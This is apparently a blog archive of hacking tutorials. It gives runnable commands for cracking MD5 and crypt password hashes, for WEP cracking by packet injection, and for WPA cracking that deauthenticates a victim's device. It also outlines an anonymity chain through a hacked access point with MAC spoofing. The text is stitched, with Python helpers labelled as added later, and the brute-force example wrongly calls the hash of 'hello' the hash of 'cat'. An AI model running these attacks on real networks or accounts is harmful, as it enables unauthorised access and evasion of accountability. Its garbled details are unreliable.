
Sunday, 6 September 2015

How to crack MD5 hashes with hashcat

OS: Ubuntu 15.04

There is also a GPU version (oclhashcat), but I am on my notebook so I have to use the CPU only version, which - of course - is much slower.

Download the latest hashcat version here: https://hashcat.net/hashcat/

Download a wordlist: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

Create an MD5 hash, e.g. of the string 'hello':

echo -n "hello" | md5sum
5d41402abc4b2a76b9719d911017c592

Next, extract the hashcat archive and create a .txt file with the md5 hash(es) within the folder. Also, save the wordlist in the hashcat folder.

Start hashcat with a dictionary-based attack.


Command:

./hashcat-cli64.bin -n 2 -m 0 -a 8  test.txt realhuman_phill.txt

-n, --threads=NUM       Number of threads
-m, --hash-type=NUM     Hash-type
-a, --attack-mode=NUM   Attack-mode

--> use ./hashcat-cli64.bin -h to display all available options.

test.txt is the file with the md5 hash(es) and realhuman_phill.txt is the wordlist.

Wait...


hashcat will create a file named hashcat.pot which contains the successfully cracked hashes. You can display its contents with cat:

user@user:~/Desktop/hashcat-0.50$ cat '/home/user/Desktop/hashcat-0.50/hashcat.pot'
5d41402abc4b2a76b9719d911017c592:hello

There you go: hello. 

Brute-force


If you want to read about brute-force (masked) attack have a look here: http://www.unix-ninja.com/p/Exploiting_masks_in_Hashcat_for_fun_and_profit/

Quick example of a brute-force attack for the md5 hash 'cat': 5d41402abc4b2a76b9719d911017c592


./hashcat-cli64.bin -n 2 -m 0 -a 3 test.txt ?a?a?a

?a?a?a tells hashcat to try every combination of exactly 3 characters; ?l?l?l would be lower-case only. The built-in charsets are:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~   (the first character is a space)
?a = ?l?u?d?s
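To see how strongly a mask limits the search, here is an added Python helper (not from the original post and not part of hashcat) that parses a mask with the built-in charsets listed above, computes its keyspace and estimates the worst-case time at an assumed hash rate; it also handles literal characters and the '??' escape, which the post does not cover.

```python
import string

# hashcat's built-in charsets as listed above; ?s starts with a space (33 symbols in total)
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]   # 95 characters


def mask_positions(mask):
    """Return, for each position of a hashcat mask, how many candidate characters it has."""
    sizes = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)                 # a literal character, e.g. the 'p' in 'pass?d?d'
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        tag = mask[i + 1]
        if tag == "?":
            sizes.append(1)                 # '??' is an escaped literal question mark
        elif tag in CHARSETS:
            sizes.append(len(CHARSETS[tag]))
        else:
            raise ValueError("unknown charset ?" + tag)
        i += 2
    return sizes


def keyspace(mask):
    """Number of candidates the mask expands to (the product over all positions)."""
    total = 1
    for n in mask_positions(mask):
        total *= n
    return total


def hours_to_exhaust(mask, hashes_per_second):
    """Worst-case hours to try every candidate at a given (assumed) cracking speed."""
    return keyspace(mask) / hashes_per_second / 3600.0


if __name__ == "__main__":
    rate = 10_000_000          # assumed CPU MD5 speed in hashes/s, a constructed figure
    for m in ("?a?a?a", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a"):
        print("%-20s keyspace=%-22d worst case: %.1f hours" % (m, keyspace(m), hours_to_exhaust(m, rate)))
```

Three ?a positions are exhausted in well under a second at that rate, while eight of them take years; that gap is the whole argument for long passwords drawn from every charset.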

Wednesday, 26 February 2014

How To Monitor Failed SSH Attempts

Disable Password Authentication for better Security

More about SSH can be found here.

You might be astonished how many people try to break into your computer via ssh. It is advisable to use key-based authentication only. Article for key-based authentication.

Enable monitoring

sudo gedit /etc/ssh/sshd_config
--> change LogLevel INFO to LogLevel VERBOSE

SSH login attempts will now be saved in your /var/log/auth.log file.

Accessing the information

sudo grep sshd /var/log/auth.log
sudo grep Fail /var/log/auth.log
sudo grep Invalid /var/log/auth.log
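As an added example (not from the original post), here is a small Python parser for the sshd lines that the grep commands above pull out of auth.log; it tallies failed password attempts per source address and lists usernames that do not exist on the host, which is what you want to know before blocking an address. The log lines are constructed samples in sshd's format, not real traffic.

```python
import re
from collections import Counter

# Constructed sample lines in the format sshd writes to /var/log/auth.log (not real traffic)
SAMPLE_LOG = """\
Feb 26 10:01:12 host sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Feb 26 10:01:15 host sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Feb 26 10:02:40 host sshd[2140]: Invalid user oracle from 198.51.100.23
Feb 26 10:02:44 host sshd[2140]: Failed password for invalid user oracle from 198.51.100.23 port 40211 ssh2
Feb 26 10:05:03 host sshd[2188]: Failed password for root from 203.0.113.5 port 51030 ssh2
Feb 26 10:07:19 host sshd[2201]: Accepted publickey for alice from 192.0.2.10 port 50000 ssh2: RSA SHA256:EXAMPLE
Feb 26 10:09:55 host cron[2250]: (root) CMD (run-parts /etc/cron.hourly)
"""

# "Failed password for [invalid user] NAME from ADDR port ..." (what 'grep Fail' shows)
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
# "Invalid user NAME from ADDR" (what 'grep Invalid' shows)
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (\S+) from (\S+)")


def failed_logins(log_text):
    """Count failed password attempts per source address."""
    per_source = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            per_source[m.group(2)] += 1
    return per_source


def invalid_users(log_text):
    """Usernames tried that do not exist on this host, a strong sign of automated guessing."""
    names = set()
    for line in log_text.splitlines():
        m = INVALID_RE.search(line)
        if m:
            names.add(m.group(1))
    return sorted(names)


def noisy_sources(log_text, threshold=3):
    """Addresses with at least `threshold` failures: candidates for blocking."""
    return sorted(ip for ip, n in failed_logins(log_text).items() if n >= threshold)


if __name__ == "__main__":
    # to run it on the real log: failed_logins(open("/var/log/auth.log").read())
    print(failed_logins(SAMPLE_LOG), invalid_users(SAMPLE_LOG), noisy_sources(SAMPLE_LOG))
```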

Disabling SSH altogether

sudo mv /etc/init/ssh.conf /etc/init/ssh.conf.disabled

Tuesday, 21 January 2014

How to hash and crack UNIX passwords in python

Crypt module

I am using the crypt module here, a one-way hash function based on a modified DES algorithm. You can easily adjust the script to crack the secure hash algorithms (SHA1, SHA224, SHA256, SHA384 and SHA512, defined in FIPS 180-2) as well as RSA's MD5 algorithm by using the hashlib module.

Crypt Overview

import crypt
crypt.crypt("user", "AD")
'AD5Qg2vQhsLRw'

AD is the salt, a random two-character string that perturbs the DES algorithm in one of 4096 ways.

The python password cracking script

import crypt  # Unix-only; deprecated in Python 3.11 and removed in 3.13


def testPass(hashpass):
    salt = hashpass[0:2]  # traditional DES crypt: the first two characters of the hash are the salt
    with open('dictionary.txt', 'r') as dictionary:  # this is our dictionary file
        for word in dictionary:
            word = word.strip()
            crypto = crypt.crypt(word, salt)
            if crypto == hashpass:
                print("[+] Password: " + word + "\n")
                return
    print("[-] Password Not Found.\n")
    return


def main():
    with open('passwords.txt', 'r') as hashfile:  # file with hashed passwords, one user:hash per line
        for line in hashfile:
            if ":" in line:
                user = line.split(':')[0]
                hashpass = line.split(':')[1].strip()  # strip() also drops the trailing newline
                print("[*] Cracking Password For: " + user)
                testPass(hashpass)


if __name__ == "__main__":
    main()
 
Save the script as cracker.py.
You also need to create a dictionary.txt and a passwords.txt (containing the hashed passwords, one user:hash per line) to successfully run the program.

Create a new folder, put the three files into it, and then simply run
python cracker.py

You can download all of the files here: Drive

Sunday, 12 January 2014

Installing Metasploit on Debian (or Ubuntu)

sudo su

apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev

apt-get install git-core postgresql curl ruby1.9.3 nmap gem
gem install wirble sqlite3 bundler

cd /opt
git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework
bundle install

./msfconsole


msfconsole tutorial: click

Wednesday, 17 October 2012

How to be anonymous on the internet (99-100%)

Updated: 06/2016

Summary: Tor Browser is not enough. This short tutorial will help you to significantly improve your security in only 15 minutes. 

Your online privacy is under attack. Government agencies (NSA, FBI etc.) and private companies (e.g. Google) are snooping on you. You will find a lot of tips on the web to achieve online anonymity, but most of it is useless.

The information below will give you a rock-solid setup in a reasonable amount of time. If you run into any problems post a comment and I will help you out.

It is possible to avoid being tracked, but to stay anonymous online you need a) a good setup and b) use your common sense.

My setup | User -> VPN -> Tor -> Internet

Using Tor alone is often not enough as a Harvard student had to learn when he emailed a bomb threat to campus officials to avoid having to write a final exam.  He was deanonymized by the fact that he was the only person using Tor on the campus network at the time the email was sent.

A VPN will hide the fact that you are using Tor from your Internet service provider or the network you are connected to. Choosing a VPN which can be trusted is extremely important. Companies such as Hide My Ass will reveal your identity as soon as someone knocks on their door. Money spent on these kinds of operators is completely wasted.

Step 1: VPN

Find a good VPN provider. I am using NordVPN. Their servers are operated under the jurisdiction of Panama, they have a no logs policy and it is possible to pay in Bitcoins for their services.

After you have signed up, install OpenVPN or use NordVPN's software and connect to the NordVPN network or the network of your VPN provider of choice.

A VPN will add a layer of protection regardless of whether you decide to proceed with Step 2 or not.

Step 2: Virtual Environment and Tor

Next, download VirtualBox and Whonix-Workstation/Gateway, which is a security-focused Linux distribution that tunnels ALL traffic through Tor. Install VirtualBox.


Open VirtualBox and import the two (!) .ova files (Whonix) into VirtualBox. To do this go to File --> Import Appliance.


First start Whonix-Gateway.


As soon as you see the Desktop of Whonix-Gateway go back to VirtualBox and start Whonix-Workstation. 

Everything you do (e.g. surfing the deep web) is done on Whonix-Workstation.


Important: USE your brain.

The best possible setup won't help you if you are careless and login to your normal Facebook/Gmail account while hiding behind VPNs and Tor. Do not use your everyday email address and do not use your everyday username for any anonymous activity online.

Unfortunately people make mistakes, but by using a virtual environment (Whonix) you can greatly mitigate that risk. It will help you separate your two identities and thus stay truly anonymous online.

If you have any questions or problems, please write a comment below.


EXTRA (You don't need this)
Please be aware that the following is of theoretical nature only. Breaking into networks without consent is illegal.

In theory the following setup would make it impossible to track somebody down: User --> hacked Wireless Access Point Router --> VPN --> Tor (Whonix) --> Internet

Don't use Windows, but a clean install of Debian instead. Make sure you enable full disk encryption (password should be a minimum of 30 characters).

Securely erase your HDD: Boot from an Ubuntu live CD. Install wipe (sudo apt-get install wipe) and wipe the hard disk drive.

- WEP poses a significant security risk: http://ubuntu-skype.blogspot.co.at/2012/08/how-to-crack-wep-with-aircrack-ng.html


An adversary will most likely change his MAC address. This can be done via macchanger, e.g. macchanger -r wlan0



Tuesday, 11 September 2012

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a long password drawn from the full 128-character ASCII set with your computer.

Ok, the command:

This was on Backtrack:
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

On Debian:
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)


By default john will only try passwords with 8 characters or less. However, the minimum pass-phrase length for WPA is 8. You need to edit the john.conf file to change the maximum length of the output.

"--incremental:all" means that john will try all 128 ASCII characters, which will take thousands of years to complete if the password has a proper length. You can also try -i:digits for numbers only or -i:alpha for a to z.

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I'll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It won't work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H. It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) --bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. You need around 10k of data to successfully crack WEP.
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for "Association successful"
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for "Key Found"
  22. Enter the key without ':'.
This can be done in approx. 10 minutes. Have fun!

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need

  • Backtrack (or Linux with aircrack-ng installed)
  • Virtual machine (e.g. Vmware or Virtualbox)
  • Password list
  • USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H



Alright, fire up the terminal.

Commands

  1. airmon-ng
  2. airmon-ng start wlan0
  3. ifconfig mon0 down
  4. macchanger -m 00:11:22:33:44:55 mon0
  5. ifconfig mon0 up
  6. airodump-ng mon0 (let it scan for a minute)
  7. CTRL + C (stop)
  8. airodump-ng -c (channel) -w (filename, e.g. wpa) --bssid (xx:xx:xx:xx:xx:xx) mon0

Now, we need to deauthenticate a user's PC currently on the network (by its MAC address).

  1. open another console
  2. aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0
  3. Wait for WPA handshake ==> airodump-ng
  4. All cracking can be done offline.
  5. aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
    • this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.

Any problems? Ask!